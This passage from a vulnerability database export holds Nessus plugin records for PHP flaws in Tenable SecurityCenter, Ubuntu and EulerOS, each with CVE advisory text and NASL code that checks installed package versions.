a\nPHP library that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of PHP :\n\n - An out-of-bounds read error exists in the PCRE library\n in the compile_bracket_matchingpath() function within\n file pcre_jit_compile.c. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n regular expression, to crash a process linked to the\n library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics\n Library (LibGD) in the gdImageCreateFromGifCtx()\n function within file gd_gif_in.c when handling a\n specially crafted GIF file. An unauthenticated, remote\n attacker can exploit this to disclose sensitive memory\n contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the\n match_at() function within file regexec.c. An\n unauthenticated, remote attacker can exploit this to\n disclose sensitive memory contents or crash a process\n linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the\n next_state_val() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the\n mbc_enc_len() function within file utf8.c. An\n unauthenticated, remote attacker can exploit this to\n disclose memory contents or crash a process linked to\n the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the\n bitset_set_range() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma\n in the left_adjust_char_head() function within file\n regexec.c during regular expression compilation. An\n unauthenticated, remote attacker can exploit this to\n crash a process linked to the library, resulting in a\n denial of service condition. (CVE-2017-9229)\n\n - A denial of service condition exists in PHP when\n handling overlarge POST requests. An unauthenticated,\n remote attacker can exploit this to exhaust available\n CPU resources. (CVE-2017-11142)\n\n - An extended invalid free error exists in PHP in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c when parsing empty boolean tags.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2017-11143)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function\n within file crypto/evp/p_seal.c due to returning an\n undocumented value of '-1'. An unauthenticated, remote\n attacker can exploit this to cause an unspecified\n impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the\n php_parse_date() function within file\n ext/date/lib/parse_date.c. An unauthenticated, remote\n attacker can exploit this to disclose memory contents or\n cause a denial of service condition.\n (CVE-2017-11145)\n\n - An out-of-bounds read error exists in PHP in the\n finish_nested_data() function within file\n ext/standard/var_unserializer.re. An unauthenticated,\n remote attacker can exploit this to disclose memory\n contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the\n INI parsing API, specifically in the zend_ini_do_op()\n function within file Zend/zend_ini_parser.y, due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code.\n\n - A Heap buffer overread flaw in finish_nested_data\n while unserializing untrusted data could lead to an\n unspecified impact on the integrity of PHP.\n (CVE-2017-12933)\n\n - A stack-based buffer overflow in the zend_ini_do_op()\n function in Zend/zend_ini_parser.c could cause a denial\n of service or potentially allow executing code.\n (CVE-2017-11628)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2017-12\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.31\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.tenable.com/support-center/index.php?x=&mod_id=160\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch as referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9224\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_keys(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/php/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\napp = 'PHP (within SecurityCenter)';\nfix = \"5.6.31\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/php/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (ver_compare(ver:version, minver:\"5.6.0\", fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter PHP version : ' + version +\n '\\n Fixed PHP version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:47", "description": "It was discovered that the PHP opcache created keys for files it cached based on their filepath. A local attacker could possibly use this issue in a shared hosting environment to obtain sensitive information. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2015-8994)\n\nIt was discovered that the PHP URL parser incorrectly handled certain URI components. A remote attacker could possibly use this issue to bypass hostname-specific URL checks. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-10397)\n\nIt was discovered that PHP incorrectly handled certain boolean parameters when unserializing data. A remote attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service. This issue only affected Ubuntu 14.04 LTS. (CVE-2017-11143)\n\nSebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang discovered that PHP incorrectly handled the OpenSSL sealing function. A remote attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service. (CVE-2017-11144)\n\nWei Lei and Liu Yang discovered that the PHP date extension incorrectly handled memory. A remote attacker could possibly use this issue to disclose sensitive information from the server.\n(CVE-2017-11145)\n\nIt was discovered that PHP incorrectly handled certain PHAR archives.\nA remote attacker could use this issue to cause PHP to crash or disclose sensitive information. This issue only affected Ubuntu 14.04 LTS. (CVE-2017-11147)\n\nIt was discovered that PHP incorrectly handled locale length. A remote attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service. (CVE-2017-11362)\n\nWei Lei and Liu Yang discovered that PHP incorrectly handled parsing ini files. An attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service. (CVE-2017-11628)\n\nIt was discovered that PHP mbstring incorrectly handled certain regular expressions. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2017-9224, CVE-2017-9226, CVE-2017-9227, CVE-2017-9228, CVE-2017-9229).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-08-11T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : php5, php7.0 vulnerabilities (USN-3382-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8994", "CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11628", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php7.0", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-fpm", "p-cpe:/a:canonical:ubuntu_linux:php7.0-cgi", "p-cpe:/a:canonical:ubuntu_linux:php7.0-cli", "p-cpe:/a:canonical:ubuntu_linux:php7.0-fpm", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.04"], "id": "UBUNTU_USN-3382-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102416", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3382-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102416);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2015-8994\", \"CVE-2016-10397\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11147\", \"CVE-2017-11362\", \"CVE-2017-11628\", \"CVE-2017-9224\", \"CVE-2017-9226\", \"CVE-2017-9227\", \"CVE-2017-9228\", \"CVE-2017-9229\");\n script_xref(name:\"USN\", value:\"3382-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : php5, php7.0 vulnerabilities (USN-3382-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that the PHP opcache created keys for files it\ncached based on their filepath. A local attacker could possibly use\nthis issue in a shared hosting environment to obtain sensitive\ninformation. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2015-8994)\n\nIt was discovered that the PHP URL parser incorrectly handled certain\nURI components. A remote attacker could possibly use this issue to\nbypass hostname-specific URL checks. This issue only affected Ubuntu\n14.04 LTS. (CVE-2016-10397)\n\nIt was discovered that PHP incorrectly handled certain boolean\nparameters when unserializing data. A remote attacker could possibly\nuse this issue to cause PHP to crash, resulting in a denial of\nservice. This issue only affected Ubuntu 14.04 LTS. (CVE-2017-11143)\n\nSebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang discovered that PHP\nincorrectly handled the OpenSSL sealing function. A remote attacker\ncould possibly use this issue to cause PHP to crash, resulting in a\ndenial of service. (CVE-2017-11144)\n\nWei Lei and Liu Yang discovered that the PHP date extension\nincorrectly handled memory. A remote attacker could possibly use this\nissue to disclose sensitive information from the server.\n(CVE-2017-11145)\n\nIt was discovered that PHP incorrectly handled certain PHAR archives.\nA remote attacker could use this issue to cause PHP to crash or\ndisclose sensitive information. This issue only affected Ubuntu 14.04\nLTS. (CVE-2017-11147)\n\nIt was discovered that PHP incorrectly handled locale length. A remote\nattacker could possibly use this issue to cause PHP to crash,\nresulting in a denial of service. (CVE-2017-11362)\n\nWei Lei and Liu Yang discovered that PHP incorrectly handled parsing\nini files. An attacker could possibly use this issue to cause PHP to\ncrash, resulting in a denial of service. (CVE-2017-11628)\n\nIt was discovered that PHP mbstring incorrectly handled certain\nregular expressions. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2017-9224, CVE-2017-9226, CVE-2017-9227,\nCVE-2017-9228, CVE-2017-9229).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3382-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.5.9+dfsg-1ubuntu4.22\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cgi\", pkgver:\"5.5.9+dfsg-1ubuntu4.22\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cli\", pkgver:\"5.5.9+dfsg-1ubuntu4.22\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-fpm\", pkgver:\"5.5.9+dfsg-1ubuntu4.22\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libapache2-mod-php7.0\", pkgver:\"7.0.22-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-cgi\", pkgver:\"7.0.22-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-cli\", pkgver:\"7.0.22-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-fpm\", pkgver:\"7.0.22-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libapache2-mod-php7.0\", pkgver:\"7.0.22-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"php7.0-cgi\", pkgver:\"7.0.22-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"php7.0-cli\", pkgver:\"7.0.22-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"php7.0-fpm\", pkgver:\"7.0.22-0ubuntu0.17.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / libapache2-mod-php7.0 / php5-cgi / php5-cli / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:31:44", "description": "According to the versions of the php packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method call.(CVE-2016-7124)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP before 5.5.32, 5.6.x before 5.6.18, and 7.x before 7.0.3 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive.(CVE-2016-2554)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6831)\n\n - The sapi_header_op function in main/SAPI.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 supports deprecated line folding without considering browser compatibility, which allows remote attackers to conduct cross-site scripting (XSS) attacks against Internet Explorer by leveraging (1) %0A%20 or (2) %0D%0A%20 mishandling in the header function.(CVE-2015-8935)\n\n - The openssl_random_pseudo_bytes function in ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 incorrectly relies on the deprecated RAND_pseudo_bytes function, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors.(CVE-2015-8867)\n\n - Use-after-free vulnerability in the SPL unserialize implementation in ext/spl/spl_array.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to execute arbitrary code via crafted serialized data that triggers misuse of an array field.(CVE-2015-6832)\n\n - Directory traversal vulnerability in the PharData class in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to write to arbitrary files via a .. (dot dot) in a ZIP archive entry that is mishandled during an extractTo call.(CVE-2015-6833)\n\n - Directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before 3.12.1 allows remote attackers to create arbitrary empty directories via a crafted ZIP archive.(CVE-2014-9767)\n\n - The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.(CVE-2016-7414)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.(CVE-2016-9935)\n\n - In PHP before 5.6.31, an invalid free in the WDDX deserialization of boolean parameters could be used by attackers able to inject XML for deserialization to crash the PHP interpreter, related to an invalid free for an empty boolean element in ext/wddx/wddx.c.(CVE-2017-11143)\n\n - Integer overflow in the php_html_entities function in ext/standard/html.c in PHP before 5.5.36 and 5.6.x before 5.6.22 allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering a large output string from the htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in ext/intl/locale/locale_methods.c in PHP before 5.5.36, 5.6.x before 5.6.22, and 7.x before 7.0.7 does not ensure the presence of a '\\0' character, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a crafted locale_get_primary_language call.(CVE-2016-5093)\n\n - The grapheme_strpos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4541)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not properly construct spprintf arguments, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4542)\n\n - The phar_parse_zipfile function in zip.c in the PHAR extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\\x05\\x06 signature at an invalid location.(CVE-2016-3142)\n\n - ** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says 'Not sure if this qualifies as security issue (probably not).'(CVE-2016-4070)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (buffer under-read and segmentation fault) or possibly have unspecified other impact via crafted XML data in the second argument, leading to a parser level of zero.(CVE-2016-4539)\n\n - The grapheme_stripos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4540)\n\n - Use-after-free vulnerability in wddx.c in the WDDX extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element.(CVE-2016-3141)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR archive handler could be used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function in ext/phar/phar.c.(CVE-2017-11147)\n\n - The exif_process_IFD_in_JPEG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not validate IFD sizes, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4543)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_WVARCHAR columns, which allows remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microsoft SQL Server table.(CVE-2015-8879)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of '\\700' would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.(CVE-2017-9226)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.(CVE-2017-11144)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (type confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2016-3185)\n\n - The object_common1 function in ext/standard/var_unserializer.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (buffer over-read and application crash) via crafted serialized data that is mishandled in a finish_nested_data call.(CVE-2016-10161)\n\n - The finish_nested_data function in ext/standard/var_unserializer.re in PHP before 5.6.31, 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified impact on the integrity of PHP.(CVE-2017-12933)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-11-08T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : php (EulerOS-SA-2019-2221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-8867", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-10161", "CVE-2016-2554", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-3185", "CVE-2016-4070", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-7124", "CVE-2016-7414", "CVE-2016-9934", "CVE-2016-9935", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11147", "CVE-2017-12933", "CVE-2017-9226"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "p-cpe:/a:huawei:euleros:php-gd", "p-cpe:/a:huawei:euleros:php-ldap", "p-cpe:/a:huawei:euleros:php-mysql", "p-cpe:/a:huawei:euleros:php-odbc", "p-cpe:/a:huawei:euleros:php-pdo", "p-cpe:/a:huawei:euleros:php-pgsql", "p-cpe:/a:huawei:euleros:php-process", "p-cpe:/a:huawei:euleros:php-recode", "p-cpe:/a:huawei:euleros:php-soap", "p-cpe:/a:huawei:euleros:php-xml", "p-cpe:/a:huawei:euleros:php-xmlrpc", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2221.NASL", "href": "https://www.tenable.com/plugins/nessus/130683", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130683);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-9767\",\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-8867\",\n \"CVE-2015-8879\",\n \"CVE-2015-8935\",\n \"CVE-2016-10161\",\n \"CVE-2016-2554\",\n \"CVE-2016-3141\",\n \"CVE-2016-3142\",\n \"CVE-2016-3185\",\n \"CVE-2016-4070\",\n \"CVE-2016-4539\",\n \"CVE-2016-4540\",\n \"CVE-2016-4541\",\n \"CVE-2016-4542\",\n \"CVE-2016-4543\",\n \"CVE-2016-5093\",\n \"CVE-2016-5094\",\n \"CVE-2016-7124\",\n \"CVE-2016-7414\",\n \"CVE-2016-9934\",\n \"CVE-2016-9935\",\n \"CVE-2017-11143\",\n 